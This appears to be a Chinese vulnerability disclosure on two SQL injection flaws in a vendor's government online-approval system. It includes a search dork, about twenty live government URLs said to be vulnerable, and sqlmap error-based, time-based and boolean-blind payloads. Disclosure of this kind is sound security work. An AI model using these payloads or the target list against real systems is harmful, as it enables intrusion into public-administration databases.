某政务系统两处通用SQL注入漏洞（附众多政务案例）

### 简要描述： 某政务系统两处通用SQL注入漏洞（附众多政务案例） ### 详细说明： 系统开发厂商：邯郸市连邦软件发展有限公司 系统架构：ASPX+MSSQL 漏洞文件：workplate/xzsp/gxxt/tjfx/dtl.aspx 两处注入 xksx参数过滤存在问题，导致注入 sxmc参数过滤存在问题，导致注入 关键字：inurl：workplate 部分政府案例： 日照市网上审批系统 http://www.rzfwzx.gov.cn/workplate/ 保定市网上审批系统 http://www.bdxzfw.cn/workplate/ 磁县网上审批系统 http://www.cxxzfwzx.com/workplate/ 魏县网上审批系统 http://wxxz.gov.cn/workplate/ 邯郸县网上审批系统 http://www.hdxzwzx.com/workplate/ 南郊区网上审批系统 http://xz.njqsp.com:8001/workplate/ 城区网上审批系统 http://211.142.37.152:81/workplate/ 左云县网上审批系统 http://211.142.37.152:88/workplate/ 天镇县网上审批系统 http://211.142.37.154:83/workplate/ 广灵县网上审批系统 http://211.142.37.152:83/workplate/ 新荣区网上审批系统 http://183.203.128.238:82/workplate/ 矿区网上审批系统 http://211.142.41.114:82/workplate/ 涉县网上审批系统 http://www.hbsxxzfwzx.gov.cn/workplate/ 临漳县网上审批系统 http://www.lzxzfwzx.com/workplate/ 安新县网上审批系统 http://www.axxzfwzx.com/workplate/ 高阳县网上审批系统 http://gyxzfw.net/workplate/ 长子县网上审批系统 http://60.220.253.153:81/workplate/ 屯留县网上审批系统 http://60.220.240.7/workplate/ 浑源县网上审批系统 http://211.142.37.152:85/workplate/ 邱县网上审批系统 www.qxxzfwzx.com/workplate/ 南郊区网上审批系统 http://xz.njqsp.com:8001/workplate/ 大同县网上审批系统 http://211.142.37.152:82/workplate/ 等等 ### 漏洞证明： 漏洞验证： 日照行政审批系统：http://www.rzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=76001&refnum=137&baseorg=209&flag=%27%27&xksx=928&sxmc=%E5%B2%B1%E6%91%A9%E6%96%AF%E6%B1%BD%E8%BD%A6%E4%BC%A0%E5%8A%A8%E7%B3%BB%E7%BB%9F%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%7c%E9%82%80%E8%AF%B7%E5%A4%96%E5%9B%BD%E4%BA%BA%E6%9D%A5%E8%AE%BF为例 [<img src="https://images.seebug.org/upload/201506/09213719eb6fabf3c15c05b8869bdf47a3389bcd.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/09213719eb6fabf3c15c05b8869bdf47a3389bcd.png) ``` Place: GET Parameter: xksx Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=76001&refnum=137&baseorg=209&flag=''&xksx=928 AND 5044=CONVERT(I NT,(CHAR(58) CHAR(98) CHAR(104) CHAR(110) CHAR(58) (SELECT (CASE WHEN (5044=5044 ) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(117) CHAR(104) CHAR(120) CHAR( 58)))&sxmc=%E5%B2%B1%E6%91%A9%E6%96%AF%E6%B1%BD%E8%BD%A6%E4%BC%A0%E5%8A%A8%E7%B3 %BB%E7%BB%9F%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8|%E9%82%80%E8%AF%B7%E5%A4%96%E5% 9B%BD%E4%BA%BA%E6%9D%A5%E8%AE%BF Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: id=76001&refnum=137&baseorg=209&flag=''&xksx=928 AND 1225=(SELECT C OUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4 ,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&sxmc=%E5%B2%B1%E6%91%A9%E6% 96%AF%E6%B1%BD%E8%BD%A6%E4%BC%A0%E5%8A%A8%E7%B3%BB%E7%BB%9F%E6%9C%89%E9%99%90%E5 %85%AC%E5%8F%B8|%E9%82%80%E8%AF%B7%E5%A4%96%E5%9B%BD%E4%BA%BA%E6%9D%A5%E8%AE%BF --- ``` [<img src="https://images.seebug.org/upload/201506/09213240c21ef7cbd32cd62c49c7bed85fbd1ec2.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/09213240c21ef7cbd32cd62c49c7bed85fbd1ec2.png) 注入二： ``` Place: GET Parameter: sxmc Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=76001&refnum=137&baseorg=209&flag=''&xksx=928&sxmc=%E5%B2%B1%E6% 91%A9%E6%96%AF%E6%B1%BD%E8%BD%A6%E4%BC%A0%E5%8A%A8%E7%B3%BB%E7%BB%9F%E6%9C%89%E9 %99%90%E5%85%AC%E5%8F%B8|%E9%82%80%E8%AF%B7%E5%A4%96%E5%9B%BD%E4%BA%BA%E6%9D%A5% E8%AE%BF) AND 1052=1052 AND (9552=9552 --- ``` [<img src="https://images.seebug.org/upload/201506/0921403277c8e4f8dd397f75f3541487bf4e8f72.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/0921403277c8e4f8dd397f75f3541487bf4e8f72.png) [<img src="https://images.seebug.org/upload/201506/092144327a72ec506bc88839dfde2b8a7b213929.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/092144327a72ec506bc88839dfde2b8a7b213929.png)